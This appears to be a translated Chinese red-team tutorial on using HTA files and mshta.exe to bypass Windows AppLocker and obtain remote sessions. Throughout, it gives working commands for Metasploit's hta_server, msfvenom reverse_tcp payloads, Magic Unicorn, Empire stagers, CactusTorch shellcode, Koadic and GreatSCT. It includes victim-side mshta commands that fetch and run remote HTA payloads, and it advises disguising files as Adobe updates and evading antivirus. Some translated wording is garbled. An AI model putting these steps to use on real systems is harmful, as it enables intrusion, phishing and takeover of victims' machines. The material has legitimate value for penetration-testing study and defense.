今天,我們將學習有關HTA攻擊的不同方法。HTA是有用且重要的攻擊,因為它可以繞過應用程序白名單。在上一篇文章中,我們討論了“ Windows Applocker策略-入門指南 ”,因為它們定義了應用程序控制策略的AppLocker規則以及如何使用它們。但是今天,您將學習如何使用mshta.exe繞過Applocker策略。
而且要了解上述攻擊的不同方法總是很方便的。
表中的內容:
- 介紹
- HTA的重要性
- 不同的方法
- 結論
介紹
長期以來,HTA文件已被用作對野外惡意軟件進行偷渡式網絡攻擊或丟棄程序的一部分。這包括做一些基本的事情,例如轉移移動客戶端,並教育該網站沒有移動支持。從紅色分組和藍色分組的角度來看,HTA文件在網絡安全領域是眾所周知的,是繞過應用程序白名單的有價值的“復古”方法之一。
Mshta.exe運行Microsoft HTML應用程序主機,這是Windows OS實用程序,負責運行 HTA(HTML應用程序)文件。我們可以運行JavaScript或Visual的HTML文件。您可以使用Microsoft MSHTA.exe工具解釋這些文件。
重要性
最后,利用htaccess文件或其他策略根據瀏覽器的類別進行轉移將有助於提高獲勝率。利用HTA文件進行基於Web的攻擊。HTA文件中有很多適應性;您將有效地使其看起來像是Adobe更新程序,每位用戶的安全記錄以及許多其他功能。此外,對於不使用幾種SSL攔截/終止的公司而言,通過HTTPS傳輸HTA文件會限制發現率。HTA記錄仍無法很好地識別,因此有助於繞過防病毒軟件。最后但並非最不重要的一點是,HTA也可以用於網絡釣魚,以替代舊的Java Applet攻擊。
方法
HTA攻擊有多種方法。我們將為幾乎所有的人照亮。我們將要研究的方法是:
- Metasploit
- Setoolkit
- Magic unicorn
- Msfvenom
- Empire
- CactusTorch
- Koadic
- Great SCT
Metasploit
我們的第一種方法是在Metasploit中使用內置漏洞。為此,請轉到您的kali終端,然后輸入:
Msfconsole
Metasploit包含“ HTA Web服務器”模塊,該模塊會生成惡意的hta文件。該模塊托管一個HTML應用程序(HTA),該應用程序在打開時將通過Powershell運行有效負載。當用戶導航到HTA文件時,IE將在執行有效負載之前兩次提示它們。隨着Metasploit的啟動,輸入:
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
執行漏洞利用程序后,它將為您提供擴展名為.hta的URL鏈接。同時,Metasploit將啟動服務器,使您可以共享文件。您還必須在受害者的PC中運行此鏈接。使用以下命令:
mshta.exe http://192.168.1.109:8080/pKz4Kk059Nq9.hta
HTA的通常文件擴展名是.hta。我們之所以使用以上命令,是因為HTA就像任何擴展名為.exe的可執行文件一樣,因此是通過mshta.exe執行的。當hta由mshta.exe啟動時,它使用已簽名的Microsoft二進制文件,使您可以調用PowerShell並將有效負載直接注入內存。
執行以上命令后,您將打開一個會話。要訪問會話,請輸入:
sessions 1
這樣,您就可以進行Meterpreter會話。
Setoolkit
HTA攻擊的方法是通過setoolkit。為此,請在您的kali中打開setoolkit。然后從給定的菜單中輸入1以選擇第一個選項,以訪問社會工程工具。
在下一個給定菜單中,通過鍵入2選擇第二個選項以進入網站攻擊廠商。
從另一個給定的菜單中選擇選項8以選擇HTA攻擊方法。
選擇用於HTA攻擊的選項8后,接下來需要選擇選項2,該選項將允許您克隆站點。選擇選項2后,它將詢問您要克隆的站點的URL。提供所需的URL,如我們在此指定的' www.ignitetechnologies.in'一樣。
提供網址后,它將要求您選擇所需的儀表類型。通過鍵入3選擇第三個。
在鍵入3后按Enter鍵,該過程將開始,您將擁有處理程序(multi / handler)
現在,將您的惡意IP轉換為位鏈接,當您與受害者共享此鏈接時,這些鏈接對受害者將更真實。
當受害者瀏覽惡意鏈接上方時,文件將被保存,並在保存后自動在受害者的PC中執行;如下圖所示:
然后獲得meterpreter session。您可以使用命令“ sysinfo”獲取有關受害人PC的基本信息。
Magic Unicorn
HTA攻擊的下一種方法是使用獨角獸第三方工具。魔術獨角獸工具由Dave Kennedy開發。它是一種用戶友好的工具,使我們可以通過將shellcode直接注入內存來執行HTA攻擊。該工具最好的部分是,它與Metasploit以及Shellcode和Cobalt Strike兼容。您可以在trustsec.com上詳細了解該軟件,也可以從GitHub下載該軟件,也可以僅使用此鏈接下載該軟件。
一旦您下載了Magic Unicorn。在kali終端中打開它,然后鍵入:
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 1234 hta
執行上述命令將開始創建.hta文件的過程。所述.hta文件將在文件夾hta-attack /中創建。進入該文件夾並查看通過鍵入以下命令創建的文件列表:
cd hta_attack/
ls
現在,您將可以看到.hta文件,即Launcher.hta。啟動python服務器,以便可以共享文件。為此,請輸入:
python -m SimpleHTTPServer 80
服務器啟動並運行后,在受害者的PC的cmd提示符下執行以下命令:
mshta.exe http://192.168.1.109/Launcher.hta
執行上述命令后,您將在多重/處理器中激活您的會話。要訪問會話,請輸入:
sessions 1
MsfVenom
HTA攻擊的下一種方法是通過msfvenom手動創建.hta文件。創建一個.hta文件,在kali的終端中鍵入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f hta-psh > shell.hta
執行上述命令將創建一個.hta文件,您可以利用它來發揮自己的優勢。創建文件后,打開python服務器,通過鍵入以下內容將文件共享給受害者的PC:
python -m SimpleHTTPServer 80
通過鍵入以下命令來運行以上文件:
mshta.exe http://192.168.1.109/shell.hta
同時,在受害者的cmd提示符下運行上述文件時,啟動處理程序以接收會話。要啟動多重/處理程序類型:
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
因此,使用這種簡單的方法,您將可以進行Meterpreter會議。您可以使用sysinfo來了解受害者計算機的基礎知識。
PowerShell Empire
對於HTA攻擊的下一種方法,我們將使用Empire。Empire是一個開發后的框架。到目前為止,我們已經將hta方案與Metasploit配對,但是在這種方法中,我們將使用Empire框架。它僅僅是基於python的PowerShell Windows代理,因此非常有用。Empire是由@ harmj0y,@ sixdub,@ enigma0x3,rvrsh3ll,@ killswitch_gui和@xorrior開發的。您可以從此處下載此框架
要獲得《Empire》的基本指南,請訪問我們介紹帝國的文章:
Empire框架啟動后,鍵入listener來檢查是否有任何活動的監聽器。正如您在下圖中所看到的,沒有活動的偵聽器。所以要設置一個監聽器類型:
uselistener http
set Host http://192.168.1.109
set port 80
execute
使用以上命令,您將擁有一個活動的偵聽器。輸入回來以退出偵聽器,以便您可以啟動PowerShell
對於我們的HTA攻擊,我們將使用暫存器。 登台者(一個empire)是一小段代碼,可讓我們的惡意代碼通過受感染主機上的代理運行。因此,對於這種類型:
usestager windows/hta
set Listener http
set OutFile /root/Desktop/1.hta
execute
usestager將創建一個惡意代碼文件,該文件將保存在名為1.hta的輸出文件中。一旦文件運行,我們將在偵聽器上得到結果。通過鍵入以下命令在受害者的文件中運行文件:
mshta.exe http://192.168.1.109:8080/1.hta
要查看是否有任何會話打開,請鍵入“ agents”。這樣做將為您顯示會話名稱。要訪問該會話,請輸入:
interact L924Z1WR
上面的命令將使您可以訪問會話。
sysinfo
info
Cactustorch
Cactustorch是一個用於javascript和VBScript shellcode啟動器的框架。它是由Vincent Yiu開發的。該工具可以繞過許多常見的防御措施,這對我們到目前為止是一個優勢。需要注意的主要問題是,我們在cactustorch中使用的代碼是通過msfvenom編寫的,然后編碼為Base64,因為它僅支持該代碼。
因此,首先讓我們制造惡意軟件,然后對其進行加密。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f raw > 1.bin
現在要加密文件類型:
cat 1.bin |base64 -w 0
復制base64代碼,以備后用。
現在我們已經准備好了惡意軟件,讓我們下載cactustorch。你可以在這里下載:
https://github.com/mdsecactivebreach/CACTUSTORCH
安裝完成后,在已安裝文件夾的內容中鍵入以下內容:
ls -la
./CACTUSTORCH.hta
上面的命令將啟動cactustorch進行hta攻擊。
Cactustorch啟動后,將base64代碼粘貼到高亮顯示的空間中,如下圖所示,該圖像已被復制。
添加代碼后,讓我們在受害者的PC中鍵入以下內容來執行文件:
mshta.exe http://192.168.1.109/CACTUSTORCH.hta
同時,啟動您的多重/處理器以接收會話。對於多/處理程序類型:
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
在受害者的PC中執行文件后,即可進行會話。
Koadic
我們的下一個方法是使用Koadic。Koadic,或COM Command&Control,是Windows開發后的rootkit,類似於Meterpreter和Powershell Empire等其他滲透測試工具。要了解有關Koadic的更多信息,請通過以下鏈接閱讀有關該框架的詳細文章: //www.hackingarticles.in/koadic-com-command-control-framework
koadic啟動並運行后,鍵入info以獲取需要提供的詳細信息列表才能進行會話。通過信息,您知道需要提供srvhost以及設置端點。因此,設置它們為:
set srvhost 192.168.1.107
set ENDPOINT sales
run
通過鍵入以下命令,將您作為受害者計算機中的文件:
http://192.168.1.107:9999/sales
您將啟動一個會話並開始運行。要知道會話類型的名稱:
zombies
現在訪問會話類型:
zombies 0
GreatSCT
GreatSCT是一種工具,可讓您使用Metasploit漏洞,並繞過大多數防病毒軟件。GreatSCT當前在@ConsciousHacker的支持下。您可以從這里下載
下載並運行后,鍵入以下命令以訪問模塊:
use Bypass
現在查看有效負載列表:
list
現在,從有效負載列表中,您可以選擇任何人進行所需的攻擊。但是對於這種攻擊,我們將使用:
use mshta/shellcode_inject/base64_migrate.py
執行命令后,鍵入:
generate
執行generate命令后,它會詢問您要使用哪種方法。由於我們將使用msfvenom類型1選擇第一個選項。然后按Enter鍵進行抄表。然后分別提供lhost和lport,即192.168.1.107和4321。
生成shellcode時,它將要求您提供有效負載的名稱。默認情況下,它將以“有效載荷”作為名稱。因為我不想給任何名字,所以我只按Enter鍵。
現在,它制作了兩個文件。一個資源文件,另一個hta文件。
現在,首先,通過鍵入以下內容在/ usr / share / greatsct-output中啟動python的服務器:
python -m SimpleHTTPServer 80
現在,在受害計算機的命令提示符下執行hta文件。
同時,使用資源文件啟動多重/處理程序。為此,請輸入:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
瞧!你有會議。
結論
因此,基本上,這種類型的攻擊是一種簡單的HTA攻擊,可提供對遠程攻擊者的完全訪問權限。攻擊者可以使用Web技術克隆Windows站點,從而為Windows操作系統創建惡意應用程序。簡而言之,它通過HTA文件執行PowerShell注入,這些文件可用於通過瀏覽器進行基於Windows的PowerShell開發。以上是用於攻擊的方法。正如他們所說,如果一扇門關閉,另一扇門就會打開。因此,當通過不同方式學習到相同的攻擊時通常很方便。